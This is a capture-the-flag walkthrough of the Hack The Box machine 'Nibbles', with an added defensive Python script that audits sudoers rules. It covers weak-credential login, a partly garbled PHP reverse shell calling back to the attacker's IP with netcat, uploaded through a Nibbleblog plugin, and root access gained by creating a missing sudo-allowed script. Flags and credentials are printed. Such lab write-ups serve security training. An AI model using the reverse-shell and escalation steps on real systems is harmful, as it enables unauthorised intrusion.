Nibbles

htb linux easy nibbleblog file-upload sudo shell-script

Machine Information

  • Platform: Linux
  • Difficulty: Easy
  • IP Address: 10.10.10.75

Initial Enumeration

Nmap Scan

attacker@kali:~$ nmap -Pn -p- -sC -sV --min-rate 5000 10.10.10.75

Service Enumeration

Web Application

The main page shows a simple “Hello world!” message with nothing of interest. However, viewing the page source reveals a comment:

HTML Source Comment

<!-- /nibbleblog/ directory. Nothing interesting here! -->

Navigating to http://10.10.10.75/nibbleblog/ reveals a blog powered by Nibbleblog.

Directory Enumeration

attacker@kali:~$ gobuster dir -u http://10.10.10.75/nibbleblog/ -w /usr/share/wordlists/dirb/common.txt -x html,php

The admin.php page is a login portal. After trying common credentials, admin:nibbles successfully authenticates.


Exploitation

Nibbleblog File Upload Vulnerability

Once logged in as admin, I navigated to Plugins → My Image which allows file uploads. Nibbleblog has a known vulnerability where arbitrary PHP files can be uploaded despite the “Images only” restriction.

Reference: Exploit-DB: Nibbleblog File Upload

Creating PHP Reverse Shell

attacker@kali:~$ # Create simple PHP reverse shell
attacker@kali:~$ cat > shell.php << 'EOF'
&1|nc 10.10.14.5 4444 >/tmp/f"); ?>
EOF

I uploaded shell.php through the My Image plugin interface. The file was uploaded successfully to:

/nibbleblog/content/private/plugins/my_image/image.php

Triggering the Shell

attacker@kali:~$ # Start netcat listener
attacker@kali:~$ nc -nvlp 4444

Then navigate to: http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

Reverse Shell Connection

listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.75] 54832
/bin/sh: 0: can't access tty; job control turned off
$ whoami
nibbler
$ ls -la /home/nibbler
total 20
drwxr-xr-x 3 nibbler nibbler 4096 Dec 29  2017 .
drwxr-xr-x 3 root    root    4096 Dec 10  2017 ..
-rw------- 1 nibbler nibbler    0 Dec 29  2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10  2017 .nano
-r-------- 1 nibbler nibbler 1855 Dec 10  2017 personal.zip
-r-------- 1 nibbler nibbler   33 Dec 10  2017 user.txt
USER FLAG HTB
b02ff32bb332deba49eeaed21152c8d8

Post-Exploitation Enumeration

$ sudo -l

Sudo Permissions

Matching Defaults entries for nibbler on nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

The user can run /home/nibbler/personal/stuff/monitor.sh as root without a password. This script doesn’t exist yet, giving us full control over what runs as root!


Privilege Escalation

Creating Malicious monitor.sh

$ # Unzip personal.zip (if it exists)
$ unzip personal.zip
$ # Create the directory structure
$ mkdir -p /home/nibbler/personal/stuff
$ # Create malicious monitor.sh
$ echo '#!/bin/bash' > /home/nibbler/personal/stuff/monitor.sh
$ echo '/bin/bash -i' >> /home/nibbler/personal/stuff/monitor.sh
$ # Make it executable
$ chmod +x /home/nibbler/personal/stuff/monitor.sh
$ # Execute with sudo
$ sudo /home/nibbler/personal/stuff/monitor.sh

Root Shell Obtained

root@nibbles:~# whoami
root
root@nibbles:~# id
uid=0(root) gid=0(root) groups=0(root)
ROOT FLAG HTB
b6d745c0dfb6457c55591efc898ef88c

Why This Works

The sudo entry allows running /home/nibbler/personal/stuff/monitor.sh as root, but the script doesn’t exist. Since the nibbler user owns the /home/nibbler/ directory, we can create the entire path structure and write our own malicious script that will execute as root.
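The condition described above (a sudo target whose path runs through a directory the rule's user owns, or that does not exist at all) is easy to audit for from the defender's side. The following script is an added example, not part of this writeup or of any tool on the box: it parses sudoers-style rule lines and, for each command a non-root user may run, walks the target path from / downward and reports the first component the user could create or replace. The filesystem is a constructed in-memory model (owners and modes chosen to mirror the `ls -la` output above plus two invented entries under /opt and /usr/sbin), the sudoers lines are constructed, and the parser is a simplified one that ignores aliases and `!` negations; on a real host you would replace the model with `os.stat` calls.

```python
import os
import re
from dataclasses import dataclass

# Constructed model of part of the Nibbles filesystem: path -> (owner, mode).
# Paths absent from the dict do not exist. /home/nibbler is owned by nibbler,
# as the `ls -la` above shows; personal/stuff/monitor.sh did not exist.
# /opt/backup.sh (world-writable) and the /usr/sbin gap are invented for the demo.
FAKE_FS = {
    "/": ("root", 0o755),
    "/home": ("root", 0o755),
    "/home/nibbler": ("nibbler", 0o755),
    "/usr": ("root", 0o755),
    "/usr/bin": ("root", 0o755),
    "/usr/bin/id": ("root", 0o755),
    "/opt": ("root", 0o755),
    "/opt/backup.sh": ("root", 0o777),
}

# Constructed sudoers lines in the canonical `user host=(runas) [TAG:] cmd, cmd`
# form. The nibbler line is the rule that `sudo -l` reported on Nibbles.
SAMPLE_SUDOERS = """\
# comment line
Defaults env_reset
root ALL=(ALL:ALL) ALL
nibbler ALL=(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
backup ALL=(root) /usr/bin/id, /opt/backup.sh
backup ALL=(root) /usr/sbin/missing-tool --flag
"""

# Simplified rule grammar (assumption): no aliases, no '!' negations.
RULE_RE = re.compile(
    r"^(?P<user>[^\s#]+)\s+(?P<host>\S+?)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$"
)


@dataclass
class Finding:
    user: str
    runas: str
    command: str
    severity: str  # "high" or "info"
    reason: str


def parse_rules(text):
    """Return [(user, runas, [command, ...])] for each user rule line,
    skipping comments, blank lines and Defaults entries."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        rules.append((m.group("user"), m.group("runas"), cmds))
    return rules


def path_components(path):
    """'/a/b/c' -> ['/', '/a', '/a/b', '/a/b/c']."""
    out = ["/"]
    for part in path.strip("/").split("/"):
        if part:
            out.append(os.path.join(out[-1], part))
    return out


def user_controls(user, path, fs):
    """Walk `path` from / downward. Returns ('writable', component) at the first
    existing component owned by `user` or world-writable (everything beneath it
    can then be created or replaced), ('missing', component) if a component is
    absent under a parent the user does not control, or ('ok', path)."""
    for comp in path_components(path):
        if comp not in fs:
            return "missing", comp
        owner, mode = fs[comp]
        if owner == user or mode & 0o002:
            return "writable", comp
    return "ok", path


def audit(sudoers_text, fs=FAKE_FS):
    """Produce findings for every non-root rule whose target the user controls
    or whose target does not exist."""
    findings = []
    for user, runas, cmds in parse_rules(sudoers_text):
        if user == "root":
            continue
        for cmd in cmds:
            if cmd == "ALL":
                findings.append(Finding(user, runas, cmd, "high", "rule permits any command"))
                continue
            path = cmd.split()[0]  # drop any fixed arguments
            verdict, comp = user_controls(user, path, fs)
            if verdict == "writable":
                findings.append(Finding(user, runas, cmd, "high",
                    f"{comp} is controlled by {user}; the target can be created or replaced"))
            elif verdict == "missing":
                findings.append(Finding(user, runas, cmd, "info",
                    f"{comp} does not exist; the rule is dead and should be removed"))
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS):
        print(f"[{f.severity}] {f.user} -> ({f.runas}) {f.command}: {f.reason}")
```

The fix the audit points at is the same in every case: a sudo target must live in a root-owned path that the user cannot write to at any level, and rules for scripts that are not installed should not exist at all.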

Loot

Credentials

🔐 Nibbleblog Admin Portal
Username: admin
Password: nibbles
Host: 10.10.10.75
Notes: Weak default credentials

Key Takeaways

  1. HTML source comments can reveal hidden directories and sensitive information
  2. Nibbleblog’s file upload plugin doesn’t properly validate file types, allowing PHP upload
  3. Default/weak credentials like admin:nibbles are still commonly found in CTF boxes and real systems
  4. Sudo wildcards and missing files create privilege escalation opportunities - if you can create the file that sudo will execute, you control what runs as root
  5. Always check for zip files or archives in user home directories - they may contain useful information or scripts